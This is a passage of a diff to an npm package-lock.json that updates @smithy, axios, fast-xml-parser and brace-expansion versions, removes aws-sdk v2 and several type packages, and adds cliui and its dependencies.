"sha512-a5bNrdiONYB/qE2BuKegvUMd/+ZDwdg4vsNuuSzYE8qs2EYAdK9CynL+Rzn29PbPiUqoz/cbpRbcLzD5lEevHw==", "license": "Apache-2.0", "dependencies": { - "@smithy/property-provider": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11053,17 +11098,17 @@ } }, "node_modules/@smithy/util-defaults-mode-node": { - "version": "4.2.48", - "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-4.2.48.tgz", - "integrity": "sha512-FqOKTlqSaoV3nzO55pMs5NBnZX8EhoI0DGmn9kbYeXWppgHD6dchyuj2HLqp4INJDJbSrj6OFYJkAh/WhSzZPg==", + "version": "4.2.54", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-4.2.54.tgz", + "integrity": "sha512-g1cvrJvOnzeJgEdf7AE4luI7gp6L8weE0y9a9wQUSGtjb8QRHDbCJYuE4Sy0SD9N8RrnNPFsPltAz/OSoBR9Zw==", "license": "Apache-2.0", "dependencies": { - "@smithy/config-resolver": "^4.4.13", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/config-resolver": "^4.4.17", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11071,13 +11116,13 @@ } }, "node_modules/@smithy/util-endpoints": { - "version": "3.3.3", - "resolved": "https://registry.npmjs.org/@smithy/util-endpoints/-/util-endpoints-3.3.3.tgz", - "integrity": "sha512-VACQVe50j0HZPjpwWcjyT51KUQ4AnsvEaQ2lKHOSL4mNLD0G9BjEniQ+yCt1qqfKfiAHRAts26ud7hBjamrwig==", + "version": "3.4.2", + "resolved": "https://registry.npmjs.org/@smithy/util-endpoints/-/util-endpoints-3.4.2.tgz", + "integrity": "sha512-a55Tr+3OKld4TTtnT+RhKOQHyPxm3j/xL4OR83WBUhLJaKDS9dnJ7arRMOp3t31dcLhApwG9bgvrRXBHlLdIkg==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11097,12 +11142,12 @@ } }, "node_modules/@smithy/util-middleware": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-4.2.12.tgz", - "integrity": "sha512-Er805uFUOvgc0l8nv0e0su0VFISoxhJ/AwOn3gL2NWNY2LUEldP5WtVcRYSQBcjg0y9NfG8JYrCJaYDpupBHJQ==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-4.2.14.tgz", + "integrity": "sha512-1Su2vj9RYNDEv/V+2E+jXkkwGsgR7dc4sfHn9Z7ruzQHJIEni9zzw5CauvRXlFJfmgcqYP8fWa0dkh2Q2YaQyw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11110,13 +11155,13 @@ } }, "node_modules/@smithy/util-retry": { - "version": "4.2.13", - "resolved": "https://registry.npmjs.org/@smithy/util-retry/-/util-retry-4.2.13.tgz", - "integrity": "sha512-qQQsIvL0MGIbUjeSrg0/VlQ3jGNKyM3/2iU3FPNgy01z+Sp4OvcaxbgIoFOTvB61ZoohtutuOvOcgmhbD0katQ==", + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/@smithy/util-retry/-/util-retry-4.3.5.tgz", + "integrity": "sha512-h1IJsbgMDA+jaTjrco/JsyfWOgHRJBv8myB1y4AEI2fjIzD6ktZ7pFAyTw+gwN9GKIAygvC6db0mq0j8N2rFOg==", "license": "Apache-2.0", "dependencies": { - "@smithy/service-error-classification": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/service-error-classification": "^4.3.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11124,14 +11169,14 @@ } }, "node_modules/@smithy/util-stream": { - "version": "4.5.21", - "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-4.5.21.tgz", - "integrity": "sha512-KzSg+7KKywLnkoKejRtIBXDmwBfjGvg1U1i/etkC7XSWUyFCoLno1IohV2c74IzQqdhX5y3uE44r/8/wuK+A7Q==", + "version": "4.5.25", + "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-4.5.25.tgz", + "integrity": "sha512-/PFpG4k8Ze8Ei+mMKj3oiPICYekthuzePZMgZbCqMiXIHHf4n2aZ4Ps0aSRShycFTGuj/J6XldmC0x0DwednIA==", "license": "Apache-2.0", "dependencies": { - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/types": "^4.13.1", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "@smithy/util-buffer-from": "^4.2.2", "@smithy/util-hex-encoding": "^4.2.2", @@ -11168,12 +11213,12 @@ } }, "node_modules/@smithy/util-waiter": { - "version": "4.2.14", - "resolved": "https://registry.npmjs.org/@smithy/util-waiter/-/util-waiter-4.2.14.tgz", - "integrity": "sha512-2zqq5o/oizvMaFUlNiTyZ7dbgYv1a893aGut2uaxtbzTx/VYYnRxWzDHuD/ftgcw94ffenua+ZNLrbqwUYE+Bg==", + "version": "4.2.16", + "resolved": "https://registry.npmjs.org/@smithy/util-waiter/-/util-waiter-4.2.16.tgz", + "integrity": "sha512-GtclrKoZ3Lt7jPQ7aTIYKfjY92OgceScftVnkTsG8e1KV8rkvZgN+ny6YSRhd9hxB8rZtwVbmln7NTvE5O3GmQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11267,15 +11312,6 @@ "integrity": "sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A==", "license": "MIT" }, - "node_modules/@tootallnate/once": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", - "integrity": "sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", - "license": "MIT", - "engines": { - "node": ">= 10" - } - }, "node_modules/@tsconfig/node10": { "version": "1.0.9", "resolved": "https://registry.npmjs.org/@tsconfig/node10/-/node10-1.0.9.tgz", @@ -11323,12 +11359,6 @@ "resolved": "https://registry.npmjs.org/@types/btoa-lite/-/btoa-lite-1.0.2.tgz", "integrity": "sha512-ZYbcE2x7yrvNFJiU7xJGrpF/ihpkM7zKgw8bha3LNJSesvTtUNxbpzaT7WXBIryf6jovisrxTBvymxMeLLj1Mg==" }, - "node_modules/@types/caseless": { - "version": "0.12.5", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", - "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==", - "license": "MIT" - }, "node_modules/@types/chai": { "version": "5.2.3", "resolved": "https://registry.npmjs.org/@types/chai/-/chai-5.2.3.tgz", @@ -11437,19 +11467,6 @@ "integrity": "sha512-DaZNUvLDCAnCTjgwxgiL1eQdxIKEpNLOlTNtAgnZc50bG2copGhRrFN9/PxPBuJe+tZVLCbQ7ls0xveXVRPkvw==", "license": "MIT" }, - "node_modules/@types/jmespath": { - "version": "0.15.2", - "resolved": "https://registry.npmjs.org/@types/jmespath/-/jmespath-0.15.2.tgz", - "integrity": "sha512-pegh49FtNsC389Flyo9y8AfkVIZn9MMPE9yJrO9svhq6Fks2MwymULWjZqySuxmctd3ZH4/n7Mr98D+1Qo5vGA==", - "dev": true - }, - "node_modules/@types/js-yaml": { - "version": "4.0.9", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", - "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", - "dev": true, - "license": "MIT" - }, "node_modules/@types/json-schema": { "version": "7.0.15", "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.15.tgz", @@ -11784,35 +11801,6 @@ "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, - "node_modules/@types/request": { - "version": "2.48.12", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.12.tgz", - "integrity": "sha512-G3sY+NpsA9jnwm0ixhAFQSJ3Q9JkpLZpJbI3GMv0mIAT0y3mRabYeINzal5WOChIiaTEGQYlHOKgkaM9EisWHw==", - "license": "MIT", - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "node_modules/@types/request/node_modules/form-data": { - "version": "2.5.5", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz", - "integrity": "sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==", - "license": "MIT", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "es-set-tostringtag": "^2.1.0", - "hasown": "^2.0.2", - "mime-types": "^2.1.35", - "safe-buffer": "^5.2.1" - }, - "engines": { - "node": ">= 0.12" - } - }, "node_modules/@types/resolve": { "version": "1.20.6", "resolved": "https://registry.npmjs.org/@types/resolve/-/resolve-1.20.6.tgz", @@ -11905,12 +11893,6 @@ "@types/node": "*" } }, - "node_modules/@types/tough-cookie": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", - "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==", - "license": "MIT" - }, "node_modules/@types/triple-beam": { "version": "1.3.5", "resolved": "https://registry.npmjs.org/@types/triple-beam/-/triple-beam-1.3.5.tgz", @@ -12196,16 +12178,6 @@ } } }, - "node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", - "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", - "dev": true, - "license": "MIT", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, "node_modules/@typescript-eslint/typescript-estree/node_modules/debug": { "version": "4.4.3", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", @@ -12427,15 +12399,6 @@ "node": ">= 16" } }, - "node_modules/@xmldom/xmldom": { - "version": "0.8.10", - "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", - "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", - "license": "MIT", - "engines": { - "node": ">=10.0.0" - } - }, "node_modules/abbrev": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", @@ -13136,102 +13099,10 @@ "fastq": "^1.17.1" } }, - "node_modules/aws-sdk": { - "version": "2.1693.0", - "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1693.0.tgz", - "integrity": "sha512-cJmb8xEnVLT+R6fBS5sn/EFJiX7tUnDaPtOPZ1vFbOJtd0fnZn/Ky2XGgsvvoeliWeH7mL3TWSX5zXXGSQV6gQ==", - "deprecated": "The AWS SDK for JavaScript (v2) has reached end-of-support, and no longer receives updates. Please migrate your code to use AWS SDK for JavaScript (v3). More info https://a.co/cUPnyil", - "hasInstallScript": true, - "license": "Apache-2.0", - "dependencies": { - "buffer": "4.9.2", - "events": "1.1.1", - "ieee754": "1.1.13", - "jmespath": "0.16.0", - "querystring": "0.2.0", - "sax": "1.2.1", - "url": "0.10.3", - "util": "^0.12.4", - "uuid": "8.0.0", - "xml2js": "0.6.2" - }, - "engines": { - "node": ">= 10.0.0" - } - }, - "node_modules/aws-sdk/node_modules/buffer": { - "version": "4.9.2", - "resolved": "https://registry.npmjs.org/buffer/-/buffer-4.9.2.tgz", - "integrity": "sha512-xq+q3SRMOxGivLhBNaUdC64hDTQwejJ+H0T/NB1XMtTVEwNTrfFF3gAxiyW0Bu/xWEGhjVKgUcMhCrUy2+uCWg==", - "license": "MIT", - "dependencies": { - "base64-js": "^1.0.2", - "ieee754": "^1.1.4", - "isarray": "^1.0.0" - } - }, - "node_modules/aws-sdk/node_modules/events": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/events/-/events-1.1.1.tgz", - "integrity": "sha512-kEcvvCBByWXGnZy6JUlgAp2gBIUjfCAV6P6TgT1/aaQKcmuAEC4OZTV1I4EWQLz2gxZw76atuVyvHhTxvi0Flw==", - "license": "MIT", - "engines": { - "node": ">=0.4.x" - } - }, - "node_modules/aws-sdk/node_modules/ieee754": { - "version": "1.1.13", - "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", - "integrity": "sha512-4vf7I2LYV/HaWerSo3XmlMkp5eZ83i+/CDluXi/IGTs/O1sejBNhTtnxzmRZfvOUqj7lZjqHkeTvpgSFDlWZTg==", - "license": "BSD-3-Clause" - }, - "node_modules/aws-sdk/node_modules/isarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", - "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", - "license": "MIT" - }, - "node_modules/aws-sdk/node_modules/sax": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/sax/-/sax-1.2.1.tgz", - "integrity": "sha512-8I2a3LovHTOpm7NV5yOyO8IHqgVsfK4+UuySrXU8YXkSRX7k6hCV9b3HrkKCr3nMpgj+0bmocaJJWpvp1oc7ZA==", - "license": "ISC" - }, - "node_modules/aws-sdk/node_modules/uuid": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", - "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", - "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/aws-sdk/node_modules/xml2js": { - "version": "0.6.2", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", - "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", - "license": "MIT", - "dependencies": { - "sax": ">=0.6.0", - "xmlbuilder": "~11.0.0" - }, - "engines": { - "node": ">=4.0.0" - } - }, - "node_modules/aws-sdk/node_modules/xmlbuilder": { - "version": "11.0.1", - "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", - "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", - "license": "MIT", - "engines": { - "node": ">=4.0" - } - }, "node_modules/axios": { - "version": "1.14.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.0.tgz", - "integrity": "sha512-3Y8yrqLSwjuzpXuZ0oIYZ/XGgLwUIBU3uLvbcpb0pidD9ctpShJd43KSlEEkVQg6DS0G9NKyzOvBfUtDKEyHvQ==", + "version": "1.15.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.15.0.tgz", + "integrity": "sha512-wWyJDlAatxk30ZJer+GeCWS209sA42X+N5jU2jy6oHTp7ufw8uzUTVFBX9+wTfAlhiJXGS0Bq7X6efruWjuK9Q==", "license": "MIT", "dependencies": { "follow-redirects": "^1.15.11", @@ -13337,7 +13208,8 @@ "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "license": "MIT" }, "node_modules/base64-js": { "version": "1.5.1", @@ -13454,31 +13326,6 @@ "node": ">=8" } }, - "node_modules/bl": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/bl/-/bl-5.1.0.tgz", - "integrity": "sha512-tv1ZJHLfTDnXE6tMHv73YgSJaWR2AFuPwMntBe7XL/GBFHnT0CLnsHMogfk5+GzCDC5ZWarSCYaIGATZt9dNsQ==", - "dev": true, - "dependencies": { - "buffer": "^6.0.3", - "inherits": "^2.0.4", - "readable-stream": "^3.4.0" - } - }, - "node_modules/bl/node_modules/readable-stream": { - "version": "3.6.2", - "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", - "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", - "dev": true, - "dependencies": { - "inherits": "^2.0.3", - "string_decoder": "^1.1.1", - "util-deprecate": "^1.0.1" - }, - "engines": { - "node": ">= 6" - } - }, "node_modules/bn.js": { "version": "4.12.3", "resolved": "https://registry.npmjs.org/bn.js/-/bn.js-4.12.3.tgz", @@ -13815,13 +13662,12 @@ "integrity": "sha512-AlcaJBi/pqqJBIQ8U9Mcpc9i8Aqxn88Skv5d+xBX006BY5u8N3mGLHa5Lgppa7L/HfwgwLgZ6NYs+Ag6uUmJRA==" }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", + "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", + "license": "MIT", "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" + "balanced-match": "^1.0.0" } }, "node_modules/braces": { @@ -14043,15 +13889,6 @@ "node": "20 || >=22" } }, - "node_modules/cacache/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/call-bind": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.8.tgz", @@ -14269,11 +14106,12 @@ } }, "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", + "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", + "license": "BlueOak-1.0.0", "engines": { - "node": ">=10" + "node": ">=18" } }, "node_modules/cipher-base": { @@ -14312,21 +14150,6 @@ "node": ">=6" } }, - "node_modules/cli-cursor": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-4.0.0.tgz", - "integrity": "sha512-VGtlMu3x/4DOtIUwEkRezxUZ2lBacNJCHash0N0WeZDBS+7Ux1dm3XWAgWYxLJFMMdOeXMHXorshEFhbMSGelg==", - "dev": true, - "dependencies": { - "restore-cursor": "^4.0.0" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/cli-spinners": { "version": "2.9.2", "resolved": "https://registry.npmjs.org/cli-spinners/-/cli-spinners-2.9.2.tgz", @@ -14346,6 +14169,78 @@ "dev": true, "license": "MIT" }, + "node_modules/cliui": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", + "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "license": "ISC", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.1", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/cliui/node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "license": "MIT" + }, + "node_modules/cliui/node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "license": "MIT", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "license": "MIT", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, "node_modules/cluster-key-slot": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz", @@ -14490,7 +14385,8 @@ "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true + "dev": true, + "license": "MIT" }, "node_modules/conf": { "version": "15.0.2", @@ -16601,9 +16497,9 @@ "integrity": "sha512-eel5UKGn369gGEWOqBShmFJWfq/xSJvsgDzgLYC845GneayWvXBf0lJCBn5qTABfewy1ZDPoaR5OZCP+kssfuw==" }, "node_modules/fast-xml-builder": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.4.tgz", - "integrity": "sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==", + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz", + "integrity": "sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==", "funding": [ { "type": "github", @@ -16616,9 +16512,9 @@ } }, "node_modules/fast-xml-parser": { - "version": "5.5.9", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.9.tgz", - "integrity": "sha512-jldvxr1MC6rtiZKgrFnDSvT8xuH+eJqxqOBThUVjYrxssYTo1avZLGql5l0a0BAERR01CadYzZ83kVEkbyDg+g==", + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.1.tgz", + "integrity": "sha512-8Cc3f8GUGUULg34pBch/KGyPLglS+OFs05deyOlY7fL2MTagYPKrVQNmR1fLF/yJ9PH5ZSTd3YDF6pnmeZU+zA==", "funding": [ { "type": "github", @@ -16627,9 +16523,10 @@ ], "license": "MIT", "dependencies": { - "fast-xml-builder": "^1.1.4", - "path-expression-matcher": "^1.2.0", - "strnum": "^2.2.2" + "@nodable/entities": "^2.1.0", + "fast-xml-builder": "^1.1.5", + "path-expression-matcher": "^1.5.0", + "strnum": "^2.2.3" }, "bin": { "fxparser": "src/cli/cli.js" @@ -17126,28 +17023,6 @@ "node": ">= 0.6" } }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, "node_modules/fs-readdir-recursive": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/fs-readdir-recursive/-/fs-readdir-recursive-1.1.0.tgz", @@ -17339,15 +17214,6 @@ "is-property": "^1.0.2" } }, - "node_modules/generator-function": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/generator-function/-/generator-function-2.0.1.tgz", - "integrity": "sha512-SFdFmIJi+ybC0vjlHN0ZGVGHc3lgE0DxPAT0djjVg+kjOnSqclqmj0KQ7ykTOLP6YxoqOvuAODGdcHJn+43q3g==", - "license": "MIT", - "engines": { - "node": ">= 0.4" - } - }, "node_modules/generic-pool": { "version": "3.9.0", "resolved": "https://registry.npmjs.org/generic-pool/-/generic-pool-3.9.0.tgz", @@ -17505,15 +17371,6 @@ "node": ">= 6" } }, - "node_modules/glob/node_modules/brace-expansion": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", - "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", - "license": "MIT", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, "node_modules/glob/node_modules/minimatch": { "version": "9.0.9", 